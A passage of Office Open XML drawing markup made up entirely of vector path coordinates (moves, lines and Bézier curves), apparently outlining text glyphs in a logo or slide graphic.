                    <a:pt x="221729" y="207258"/>
                    <a:pt x="221729" y="207264"/>
                    <a:pt x="221728" y="207269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221560" y="210537"/>
                    <a:pt x="224085" y="213321"/>
                    <a:pt x="227368" y="213488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227548" y="213486"/>
                    <a:pt x="227727" y="213474"/>
                    <a:pt x="227905" y="213454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231000" y="213109"/>
                    <a:pt x="233228" y="210333"/>
                    <a:pt x="232882" y="207253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232887" y="207182"/>
                    <a:pt x="232892" y="207111"/>
                    <a:pt x="232895" y="207040"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233040" y="203858"/>
                    <a:pt x="230565" y="201162"/>
                    <a:pt x="227368" y="201018"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="246728" y="200987"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="243434" y="201155"/>
                    <a:pt x="240898" y="203943"/>
                    <a:pt x="241058" y="207222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241057" y="207237"/>
                    <a:pt x="241056" y="207252"/>
                    <a:pt x="241056" y="207268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240905" y="210536"/>
                    <a:pt x="243444" y="213307"/>
                    <a:pt x="246728" y="213457"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="246908" y="213454"/>
                    <a:pt x="247087" y="213443"/>
                    <a:pt x="247265" y="213423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250360" y="213078"/>
                    <a:pt x="252588" y="210302"/>
                    <a:pt x="252241" y="207222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252247" y="207151"/>
                    <a:pt x="252252" y="207080"/>
                    <a:pt x="252255" y="207009"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252400" y="203827"/>
                    <a:pt x="249925" y="201131"/>
                    <a:pt x="246728" y="200987"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="157949" y="200862"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="155052" y="201092"/>
                    <a:pt x="152832" y="203520"/>
                    <a:pt x="152874" y="206411"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="162961" y="206411"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="162710" y="203450"/>
                    <a:pt x="161081" y="200862"/>
                    <a:pt x="157949" y="200862"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="317432" y="199178"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="319750" y="199178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319750" y="215421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317432" y="215421"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="265587" y="199178"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="267905" y="199178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267905" y="215421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265587" y="215421"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="279621" y="199023"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="282047" y="198975"/>
                    <a:pt x="284359" y="200045"/>
                    <a:pt x="285886" y="201922"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="284351" y="203605"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="283215" y="202115"/>
                    <a:pt x="281467" y="201211"/>
                    <a:pt x="279590" y="201142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279583" y="201143"/>
                    <a:pt x="279576" y="201143"/>
                    <a:pt x="279569" y="201144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276305" y="201338"/>
                    <a:pt x="273818" y="204129"/>
                    <a:pt x="274013" y="207377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274012" y="207413"/>
                    <a:pt x="274010" y="207448"/>
                    <a:pt x="274009" y="207483"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273892" y="210753"/>
                    <a:pt x="276461" y="213497"/>
                    <a:pt x="279746" y="213613"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281625" y="213568"/>
                    <a:pt x="283384" y="212687"/>
                    <a:pt x="284539" y="211212"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="286011" y="212647"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="284483" y="214613"/>
                    <a:pt x="282119" y="215755"/>
                    <a:pt x="279621" y="215733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279598" y="215732"/>
                    <a:pt x="279575" y="215732"/>
                    <a:pt x="279552" y="215731"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="275021" y="215592"/>
                    <a:pt x="271462" y="211824"/>
                    <a:pt x="271601" y="207315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271548" y="202835"/>
                    <a:pt x="275120" y="199142"/>
                    <a:pt x="279621" y="199023"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="296473" y="198946"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="299721" y="199320"/>
                    <a:pt x="302050" y="202243"/>
                    <a:pt x="301675" y="205476"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="301675" y="215359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299419" y="215359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299419" y="212896"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="298123" y="214703"/>
                    <a:pt x="296011" y="215754"/>
                    <a:pt x="293781" y="215702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293688" y="215710"/>
                    <a:pt x="293595" y="215717"/>
                    <a:pt x="293501" y="215721"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290545" y="215845"/>
                    <a:pt x="288048" y="213562"/>
                    <a:pt x="287923" y="210620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287923" y="207222"/>
                    <a:pt x="290648" y="205382"/>
                    <a:pt x="294626" y="205382"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296250" y="205365"/>
                    <a:pt x="297866" y="205597"/>
                    <a:pt x="299419" y="206068"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="299419" y="205507"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="299448" y="205198"/>
                    <a:pt x="299442" y="204887"/>
                    <a:pt x="299400" y="204579"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299096" y="202344"/>
                    <a:pt x="297029" y="200778"/>
                    <a:pt x="294783" y="201080"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293120" y="201093"/>
                    <a:pt x="291485" y="201511"/>
                    <a:pt x="290022" y="202296"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="289332" y="200301"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="291090" y="199416"/>
                    <a:pt x="293033" y="198957"/>
                    <a:pt x="295002" y="198960"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="295490" y="198895"/>
                    <a:pt x="295984" y="198890"/>
                    <a:pt x="296473" y="198946"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="247198" y="198898"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="247303" y="198902"/>
                    <a:pt x="247407" y="198908"/>
                    <a:pt x="247512" y="198917"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251823" y="199265"/>
                    <a:pt x="255035" y="203025"/>
                    <a:pt x="254685" y="207315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254693" y="207409"/>
                    <a:pt x="254699" y="207503"/>
                    <a:pt x="254703" y="207598"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254896" y="211915"/>
                    <a:pt x="251536" y="215571"/>
                    <a:pt x="247198" y="215764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244734" y="215725"/>
                    <a:pt x="242468" y="214414"/>
                    <a:pt x="241215" y="212304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="241215" y="220440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238834" y="220440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238834" y="199178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241215" y="199334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241215" y="202452"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="242430" y="200291"/>
                    <a:pt x="244710" y="198937"/>
                    <a:pt x="247198" y="198898"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="350858" y="198836"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="351143" y="198826"/>
                    <a:pt x="351429" y="198838"/>
                    <a:pt x="351713" y="198870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354928" y="199233"/>
                    <a:pt x="357237" y="202121"/>
                    <a:pt x="356872" y="205320"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="356872" y="215203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354523" y="215203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354523" y="205850"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="354523" y="202857"/>
                    <a:pt x="352957" y="200955"/>
                    <a:pt x="350200" y="200955"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350069" y="200956"/>
                    <a:pt x="349937" y="200962"/>
                    <a:pt x="349806" y="200973"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347204" y="201197"/>
                    <a:pt x="345276" y="203478"/>
                    <a:pt x="345501" y="206068"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="345501" y="215421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343183" y="215421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343183" y="199116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345501" y="199116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345501" y="201953"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="346541" y="199981"/>
                    <a:pt x="348620" y="198771"/>
                    <a:pt x="350858" y="198836"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="331623" y="198836"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="331687" y="198836"/>
                    <a:pt x="331751" y="198837"/>
                    <a:pt x="331815" y="198839"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336346" y="198977"/>
                    <a:pt x="339906" y="202744"/>
                    <a:pt x="339768" y="207253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="339769" y="207296"/>
                    <a:pt x="339770" y="207338"/>
                    <a:pt x="339770" y="207381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="339820" y="211944"/>
                    <a:pt x="336145" y="215683"/>
                    <a:pt x="331560" y="215733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331506" y="215732"/>
                    <a:pt x="331453" y="215731"/>
                    <a:pt x="331399" y="215730"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326868" y="215591"/>
                    <a:pt x="323308" y="211824"/>
                    <a:pt x="323447" y="207315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323445" y="207262"/>
                    <a:pt x="323444" y="207208"/>
                    <a:pt x="323443" y="207155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323393" y="202610"/>
                    <a:pt x="327056" y="198885"/>
                    <a:pt x="331623" y="198836"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="227806" y="198836"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="227911" y="198840"/>
                    <a:pt x="228016" y="198846"/>
                    <a:pt x="228121" y="198855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232432" y="199203"/>
                    <a:pt x="235643" y="202963"/>
                    <a:pt x="235294" y="207253"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="235294" y="207315"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="235301" y="207409"/>
                    <a:pt x="235307" y="207504"/>
                    <a:pt x="235311" y="207598"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235505" y="211915"/>
                    <a:pt x="232145" y="215572"/>
                    <a:pt x="227807" y="215764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225332" y="215736"/>
                    <a:pt x="223051" y="214424"/>
                    <a:pt x="221792" y="212304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="221792" y="220596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219474" y="220596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219474" y="199335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221792" y="199335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221792" y="202452"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="223002" y="200262"/>
                    <a:pt x="225296" y="198883"/>
                    <a:pt x="227806" y="198836"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="158011" y="198836"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="162647" y="198836"/>
                    <a:pt x="165310" y="202639"/>
                    <a:pt x="165279" y="207284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165295" y="207544"/>
                    <a:pt x="165295" y="207804"/>
                    <a:pt x="165279" y="208064"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152748" y="208064"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="152765" y="211087"/>
                    <a:pt x="155224" y="213534"/>
                    <a:pt x="158262" y="213551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160163" y="213574"/>
                    <a:pt x="161973" y="212737"/>
                    <a:pt x="163180" y="211275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="164652" y="212615"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="163108" y="214599"/>
                    <a:pt x="160721" y="215753"/>
                    <a:pt x="158199" y="215733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158079" y="215731"/>
                    <a:pt x="157958" y="215726"/>
                    <a:pt x="157838" y="215718"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153434" y="215442"/>
                    <a:pt x="150090" y="211666"/>
                    <a:pt x="150367" y="207284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150360" y="207182"/>
                    <a:pt x="150355" y="207081"/>
                    <a:pt x="150351" y="206979"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150207" y="202625"/>
                    <a:pt x="153636" y="198979"/>
                    <a:pt x="158011" y="198836"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="205628" y="196155"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="200803" y="207378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210452" y="207378"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="306562" y="194284"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="308880" y="194284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308880" y="199178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313861" y="199178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313861" y="201298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308880" y="201298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308880" y="210807"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="308845" y="211029"/>
                    <a:pt x="308842" y="211256"/>
                    <a:pt x="308872" y="211479"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="309043" y="212759"/>
                    <a:pt x="310225" y="213659"/>
                    <a:pt x="311511" y="213488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312308" y="213488"/>
                    <a:pt x="313093" y="213295"/>
                    <a:pt x="313798" y="212927"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="313798" y="214984"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="312939" y="215469"/>
                    <a:pt x="311966" y="215716"/>
                    <a:pt x="310979" y="215702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310668" y="215731"/>
                    <a:pt x="310355" y="215724"/>
                    <a:pt x="310046" y="215682"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307818" y="215380"/>
                    <a:pt x="306258" y="213337"/>
                    <a:pt x="306562" y="211119"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="306562" y="201298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304369" y="201298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304369" y="199178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306562" y="199178"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="133921" y="193380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135894" y="193380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141690" y="211742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147736" y="193442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150273" y="193442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142692" y="215577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140656" y="215577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134861" y="197744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129003" y="215577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127029" y="215577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119448" y="193442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122048" y="193442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128094" y="211742"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="204562" y="193286"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="206755" y="193286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216435" y="215421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213866" y="215421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211392" y="209591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199863" y="209591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197357" y="215421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194882" y="215421"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="317275" y="192975"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="319938" y="192975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319938" y="195656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317275" y="195656"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="265430" y="192975"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="268093" y="192975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268093" y="195656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265430" y="195656"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="168631" y="192538"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="170981" y="192538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170981" y="202514"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="172170" y="200320"/>
                    <a:pt x="174459" y="198937"/>
                    <a:pt x="176964" y="198898"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177069" y="198902"/>
                    <a:pt x="177173" y="198908"/>
                    <a:pt x="177278" y="198917"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181589" y="199265"/>
                    <a:pt x="184800" y="203025"/>
                    <a:pt x="184451" y="207315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184459" y="207410"/>
                    <a:pt x="184465" y="207504"/>
                    <a:pt x="184469" y="207598"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184662" y="211915"/>
                    <a:pt x="181302" y="215571"/>
                    <a:pt x="176964" y="215764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174495" y="215744"/>
                    <a:pt x="172220" y="214428"/>
                    <a:pt x="170981" y="212304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="170981" y="215421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168631" y="215421"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="258382" y="192476"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="260700" y="192476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260700" y="215390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258382" y="215390"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="282158" y="137608"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="278932" y="137608"/>
                    <a:pt x="276958" y="138948"/>
                    <a:pt x="276958" y="141411"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="276958" y="141504"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="276958" y="143624"/>
                    <a:pt x="278650" y="144840"/>
                    <a:pt x="281062" y="144840"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284602" y="144840"/>
                    <a:pt x="286983" y="142845"/>
                    <a:pt x="286983" y="140008"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="286983" y="138636"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="285470" y="137944"/>
                    <a:pt x="283823" y="137593"/>
                    <a:pt x="282158" y="137608"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="174457" y="128410"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="174271" y="128411"/>
                    <a:pt x="174085" y="128420"/>
                    <a:pt x="173899" y="128436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170072" y="128763"/>
                    <a:pt x="167237" y="132115"/>
                    <a:pt x="167566" y="135924"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167562" y="135981"/>
                    <a:pt x="167560" y="136038"/>
                    <a:pt x="167558" y="136095"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167426" y="140070"/>
                    <a:pt x="170557" y="143399"/>
                    <a:pt x="174551" y="143531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174716" y="143529"/>
                    <a:pt x="174880" y="143521"/>
                    <a:pt x="175044" y="143508"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178890" y="143198"/>
                    <a:pt x="181755" y="139844"/>
                    <a:pt x="181443" y="136018"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181447" y="135960"/>
                    <a:pt x="181449" y="135903"/>
                    <a:pt x="181451" y="135846"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181583" y="131871"/>
                    <a:pt x="178452" y="128542"/>
                    <a:pt x="174457" y="128410"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="251700" y="128401"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="248136" y="129009"/>
                    <a:pt x="245742" y="132377"/>
                    <a:pt x="246352" y="135923"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="246352" y="135923"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="246227" y="136652"/>
                    <a:pt x="246227" y="137396"/>
                    <a:pt x="246352" y="138124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="246963" y="141671"/>
                    <a:pt x="250347" y="144053"/>
                    <a:pt x="253911" y="143446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257475" y="142838"/>
                    <a:pt x="259869" y="139471"/>
                    <a:pt x="259259" y="135923"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="259259" y="135923"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="259384" y="135196"/>
                    <a:pt x="259384" y="134452"/>
                    <a:pt x="259259" y="133724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="258648" y="130177"/>
                    <a:pt x="255264" y="127794"/>
                    <a:pt x="251700" y="128401"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="325796" y="122175"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333691" y="122175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339737" y="140881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345532" y="122175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353489" y="122175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343308" y="150389"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="341272" y="156001"/>
                    <a:pt x="339079" y="158089"/>
                    <a:pt x="334568" y="158089"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332205" y="158116"/>
                    <a:pt x="329886" y="157455"/>
                    <a:pt x="327895" y="156188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="330433" y="150545"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="331365" y="151172"/>
                    <a:pt x="332444" y="151547"/>
                    <a:pt x="333565" y="151636"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334768" y="151754"/>
                    <a:pt x="335881" y="150989"/>
                    <a:pt x="336197" y="149828"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="282253" y="121833"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="285542" y="121606"/>
                    <a:pt x="288781" y="122733"/>
                    <a:pt x="291212" y="124950"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293290" y="127393"/>
                    <a:pt x="294324" y="130549"/>
                    <a:pt x="294094" y="133742"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="294094" y="149859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286826" y="149859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286826" y="146742"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="284835" y="149071"/>
                    <a:pt x="281877" y="150359"/>
                    <a:pt x="278806" y="150234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278459" y="150266"/>
                    <a:pt x="278111" y="150277"/>
                    <a:pt x="277763" y="150266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273163" y="150126"/>
                    <a:pt x="269549" y="146300"/>
                    <a:pt x="269690" y="141723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269690" y="135706"/>
                    <a:pt x="274108" y="132931"/>
                    <a:pt x="280373" y="132931"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
